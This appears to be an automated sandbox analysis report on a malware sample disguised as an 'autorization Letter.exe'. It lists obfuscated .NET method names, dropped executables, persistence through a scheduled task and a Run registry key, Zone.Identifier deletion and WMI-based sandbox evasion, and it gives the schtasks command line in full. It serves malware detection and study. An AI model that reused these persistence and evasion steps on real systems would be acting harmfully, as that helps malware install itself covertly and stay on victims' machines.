Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, lSFA8pMlGZmCox3ZBB.cs | High entropy of concatenated method names: 'sXB86nBdnv', 'Xq38RWaapL', 'moR8X9FhJQ', 'zM48dEkVUe', 'PtC8qKnVDy', 'VUO84VlBkj', 'vIv8mwrgI0', 'xXa8rpPcLP', 'qrU8xfZSfU', 'GbV81IwvCi'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, tHDLKkJMT8oEx4RQ7t.cs | High entropy of concatenated method names: 'BHpKOTG7oe', 'DblK0bbnyg', 'YfrKvDoxFa', 'gQrK57AmGg', 'IqZKn7VOaW', 'SalKEYvX7q', 'pArKHFRrTx', 'nBLKhU4nBW', 'DNTKpqBI12', 'SyVKGeGAmK'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, fVF3XIqralY1JOMaqw.cs | High entropy of concatenated method names: 'G6hjT4dfqW', 'NTyj8NS2J7', 'mZsjsmuepN', 'U2Uj2xs0Yv', 'c0sjUi0jWn', 'SlWjZOUqxg', 'au0jMoRgTq', 'gvNjeLyhcQ', 'mRfjLX2VwG', 'GsZjBIqB7x'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, QW8J5PzYIbsH5vnDyy.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FvIbKCkiGl', 'NRdbgnvS8w', 'LP5bFnGG8e', 'W6pbo3VYTJ', 'WB5bjCBjUY', 'k8dbbnX3ls', 'NbTb97t94C'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, o9jdmQsGCgTIkNmGv2.cs | High entropy of concatenated method names: 'RJZswhF3tk', 't1EsfDbyks', 'RJ2sOuDKuM', 'X1Hs0xoLwY', 'zBBsgfmg0r', 'sIKsFRdVFR', 'x4PsoYsd7D', 'WWwsjdra5v', 'mnHsbYUQGC', 'aAIs94BSCt'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, nFhELShYqYU65kYU5Q9.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xpq96wgAFu', 'pbS9RaTesL', 'AQa9XfBmSa', 'Cer9d9cRdX', 'sKR9qF7YYu', 'wpc94k858D', 'Ea49mL0Wmq'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, rN9XSjdhqZcuDiacet.cs | High entropy of concatenated method names: 'Dispose', 'UsCaxPTXbZ', 'fCYl5jJTIL', 'rqtQQpOnsS', 'P0Ua1DNptF', 'vuDazw0Eik', 'ProcessDialogKey', 'wqHl78itUr', 'FEZlaiWrwq', 'DXpllTbkTF'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, tRcBh7FnfYqZ2Ih46n.cs | High entropy of concatenated method names: 'Fw5jvakq8g', 'HZPj5fBsGL', 'tkIjtanFBq', 'hnOjnb0NJw', 'o7kj6tao9C', 'X9ajEX1dI9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, rT4Z1xKJgfbBPIZRpY.cs | High entropy of concatenated method names: 'hZiUJLy4UO', 'uHfU8DxdL4', 'LIlU2JGTjh', 'd6aUZcXLVp', 'HSwUM4jW6H', 'Qs12qH9rj3', 'qiH24EpDFh', 'S1X2mbddp4', 'gUa2reNCqk', 'N5J2xhwPGo'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, DKZiXxkL622DIf6Iun.cs | High entropy of concatenated method names: 'KmfoLqTUIU', 'FsDoB94veA', 'ToString', 'juooTOMx63', 'Xb6o8yuP6N', 'DXfosh6hgt', 'FSfo2tvxY0', 'EIdoUD7por', 'q11oZ6JP5t', 'GOloM9QKHi'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, ivja7VtTKYMOBOMtQ6.cs | High entropy of concatenated method names: 'nIsASRL9P', 'B19wsfoP5', 'c49f2A9ss', 'NYqYZyWqu', 'dHg0HuCX0', 'HsENeNDcF', 'QhhvibEWC9EDfRv9mE', 'IrDUQro4XMEhJOFwBO', 'GMfjv4baZ', 'Ywi9ihNKm'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, TX5JuTvpNMXGIiq0R2.cs | High entropy of concatenated method names: 'yZRZTPIWlS', 'rU5Zsx0r2G', 'eKHZUu5uF9', 'C3FU1BHIBR', 'AsiUzVaFqF', 'emEZ7iTRfc', 'clSZa0A5kD', 'dODZl4BZSN', 'ifnZSeIgnv', 'Ry8ZkF794r'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, mYX6GjheM6iRDrSYZic.cs | High entropy of concatenated method names: 'S39bPJ9ZaI', 'EFoby6boEh', 'l6qbAJQJJE', 'iE1bw7kTID', 'knJbVbSj6w', 'x5FbfiZj9j', 'nQBbY0O8sg', 'wqubO1RBRf', 'GjCb0GNE77', 'stfbNeSYNp'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, UY6OkZmTbEf4BsBGNk.cs | High entropy of concatenated method names: 'PrW2V2eKTV', 'yfZ2Yd4ILi', 'rZpstMqMXc', 'rTBsnO2QXT', 'jOlsEmjWSy', 'BEksi450wH', 's6DsHBOP4o', 'c9lshqbbI7', 'wDQs3Ripmw', 'P95spyyPIt'
Source: 1.2.autorization Letter.exe.34598c4.0.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 1.2.autorization Letter.exe.34598c4.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, yxVmJLNMxItFD4gtlw.cs | High entropy of concatenated method names: 'LJggpU5HQm', 'G0igWpPIdo', 'fT4g6lCPHe', 'FhegRtDhGW', 'JjMg5nycZT', 'NtNgtXnF6s', 'qVugnLKtVv', 'U8CgErDyj8', 'bsqgiXf53X', 'PKegHqfQOH'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, Eqhytk7pjoST4sg0KT.cs | High entropy of concatenated method names: 'dw4baUeBSV', 'cdWbS7FcUb', 'OsIbkJwNOW', 'dSrbTJfcN0', 'XZ5b8FoXu6', 'bHSb23hhRF', 'FldbULRDY0', 'RxgjmXvJhN', 'pP8jrbBxDW', 'ILJjxZFoOf'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, YpTWJpZyAmNmFD026j.cs | High entropy of concatenated method names: 'C3VaZ4pBUS', 'dGgaMMjZy9', 'k5HaLIu74j', 'TugaB9TBP6', 'JU2ag5BGI8', 'TCRaFZtKKG', 'M55VlCUlsEkAvTCDN2', 'vRR09m5KbNajnMMu7M', 'JUBaa5srRO', 'OvsaSso6Hd'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, Ew9Mhe1NCjRAdHx3lS.cs | High entropy of concatenated method names: 'ToString', 'rcAFGBPVa2', 'RBFF5dZJxy', 'XHHFtG5hQU', 'rrmFnbcnjy', 'wvVFEv8wsX', 'JsQFicDayf', 'OKpFHuRXsb', 'vsEFhbW3ox', 'kJ8F3MUUMP'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, iPyZ94TiRa2ebZuHpM.cs | High entropy of concatenated method names: 'kiFZPRI11W', 'ICjZys9s0B', 'AhbZABqTRw', 'bmjZw6IYYQ', 'iq4ZVTwxQa', 'i5KZfJqFcI', 'qu8ZYAbQXD', 'lQIZOwPUtM', 'k96Z0kVbw5', 'DknZNKmMkm'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, md29wrV9kisHjHUXvF.cs | High entropy of concatenated method names: 'X45orGoWqu', 'BsWo1TWg9b', 'mG8j7cMn5r', 'NUajaNAsxq', 'YLooGKXZoR', 'Pn1oWngO8c', 'BNaoIBjKjA', 'vL3o6k42EV', 'o6qoRAA5FM', 'PJQoXO4TZx'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.cs | High entropy of concatenated method names: 'bWCSJCf7q9', 'cv6ST6TB7b', 'S0rS8RjYrE', 'W2eSsD7Br1', 'LwvS2ykFr2', 'LifSUNu6is', 'RD9SZLx8Qm', 'kYvSMlmx4L', 'B7gSeaoive', 'IvUSLwsrH2'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, lSFA8pMlGZmCox3ZBB.cs | High entropy of concatenated method names: 'sXB86nBdnv', 'Xq38RWaapL', 'moR8X9FhJQ', 'zM48dEkVUe', 'PtC8qKnVDy', 'VUO84VlBkj', 'vIv8mwrgI0', 'xXa8rpPcLP', 'qrU8xfZSfU', 'GbV81IwvCi'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, tHDLKkJMT8oEx4RQ7t.cs | High entropy of concatenated method names: 'BHpKOTG7oe', 'DblK0bbnyg', 'YfrKvDoxFa', 'gQrK57AmGg', 'IqZKn7VOaW', 'SalKEYvX7q', 'pArKHFRrTx', 'nBLKhU4nBW', 'DNTKpqBI12', 'SyVKGeGAmK'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, fVF3XIqralY1JOMaqw.cs | High entropy of concatenated method names: 'G6hjT4dfqW', 'NTyj8NS2J7', 'mZsjsmuepN', 'U2Uj2xs0Yv', 'c0sjUi0jWn', 'SlWjZOUqxg', 'au0jMoRgTq', 'gvNjeLyhcQ', 'mRfjLX2VwG', 'GsZjBIqB7x'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, QW8J5PzYIbsH5vnDyy.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FvIbKCkiGl', 'NRdbgnvS8w', 'LP5bFnGG8e', 'W6pbo3VYTJ', 'WB5bjCBjUY', 'k8dbbnX3ls', 'NbTb97t94C'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, o9jdmQsGCgTIkNmGv2.cs | High entropy of concatenated method names: 'RJZswhF3tk', 't1EsfDbyks', 'RJ2sOuDKuM', 'X1Hs0xoLwY', 'zBBsgfmg0r', 'sIKsFRdVFR', 'x4PsoYsd7D', 'WWwsjdra5v', 'mnHsbYUQGC', 'aAIs94BSCt'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, nFhELShYqYU65kYU5Q9.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xpq96wgAFu', 'pbS9RaTesL', 'AQa9XfBmSa', 'Cer9d9cRdX', 'sKR9qF7YYu', 'wpc94k858D', 'Ea49mL0Wmq'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, rN9XSjdhqZcuDiacet.cs | High entropy of concatenated method names: 'Dispose', 'UsCaxPTXbZ', 'fCYl5jJTIL', 'rqtQQpOnsS', 'P0Ua1DNptF', 'vuDazw0Eik', 'ProcessDialogKey', 'wqHl78itUr', 'FEZlaiWrwq', 'DXpllTbkTF'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, tRcBh7FnfYqZ2Ih46n.cs | High entropy of concatenated method names: 'Fw5jvakq8g', 'HZPj5fBsGL', 'tkIjtanFBq', 'hnOjnb0NJw', 'o7kj6tao9C', 'X9ajEX1dI9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, rT4Z1xKJgfbBPIZRpY.cs | High entropy of concatenated method names: 'hZiUJLy4UO', 'uHfU8DxdL4', 'LIlU2JGTjh', 'd6aUZcXLVp', 'HSwUM4jW6H', 'Qs12qH9rj3', 'qiH24EpDFh', 'S1X2mbddp4', 'gUa2reNCqk', 'N5J2xhwPGo'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, DKZiXxkL622DIf6Iun.cs | High entropy of concatenated method names: 'KmfoLqTUIU', 'FsDoB94veA', 'ToString', 'juooTOMx63', 'Xb6o8yuP6N', 'DXfosh6hgt', 'FSfo2tvxY0', 'EIdoUD7por', 'q11oZ6JP5t', 'GOloM9QKHi'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, ivja7VtTKYMOBOMtQ6.cs | High entropy of concatenated method names: 'nIsASRL9P', 'B19wsfoP5', 'c49f2A9ss', 'NYqYZyWqu', 'dHg0HuCX0', 'HsENeNDcF', 'QhhvibEWC9EDfRv9mE', 'IrDUQro4XMEhJOFwBO', 'GMfjv4baZ', 'Ywi9ihNKm'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, TX5JuTvpNMXGIiq0R2.cs | High entropy of concatenated method names: 'yZRZTPIWlS', 'rU5Zsx0r2G', 'eKHZUu5uF9', 'C3FU1BHIBR', 'AsiUzVaFqF', 'emEZ7iTRfc', 'clSZa0A5kD', 'dODZl4BZSN', 'ifnZSeIgnv', 'Ry8ZkF794r'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, mYX6GjheM6iRDrSYZic.cs | High entropy of concatenated method names: 'S39bPJ9ZaI', 'EFoby6boEh', 'l6qbAJQJJE', 'iE1bw7kTID', 'knJbVbSj6w', 'x5FbfiZj9j', 'nQBbY0O8sg', 'wqubO1RBRf', 'GjCb0GNE77', 'stfbNeSYNp'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, UY6OkZmTbEf4BsBGNk.cs | High entropy of concatenated method names: 'PrW2V2eKTV', 'yfZ2Yd4ILi', 'rZpstMqMXc', 'rTBsnO2QXT', 'jOlsEmjWSy', 'BEksi450wH', 's6DsHBOP4o', 'c9lshqbbI7', 'wDQs3Ripmw', 'P95spyyPIt'
Source: 10.2.tIFjYTCo.exe.27098b4.0.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 10.2.tIFjYTCo.exe.27098b4.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: C:\Users\user\Desktop\autorization Letter.exe | File created: C:\Users\user\AppData\Roaming\tIFjYTCo.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                      Boot Survival

Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTme

                      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match; File source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: tIFjYTCo.exe PID: 3440, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\autorization Letter.exe Memory allocated: 1670000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exe Memory allocated: 3420000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exe Memory allocated: 3240000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exe Memory allocated: 7F20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exe Memory allocated: 8F20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exe Memory allocated: 90C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exe Memory allocated: A0C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Memory allocated: D00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Memory allocated: 26D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Memory allocated: 24D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Memory allocated: 6EE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Memory allocated: 7EE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Memory allocated: 8070000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Memory allocated: 9070000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Memory allocated: 1150000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Memory allocated: 2C90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Memory allocated: 2AB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Memory allocated: EF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Memory allocated: 2890000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Memory allocated: 4890000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5301
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6687
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2307
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2751
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1091
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2786
                      Source: C:\Users\user\Desktop\autorization Letter.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092 Thread sleep count: 5301 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4592 Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7060 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe TID: 7164 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 1020 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 4148 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\autorization Letter.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 100000
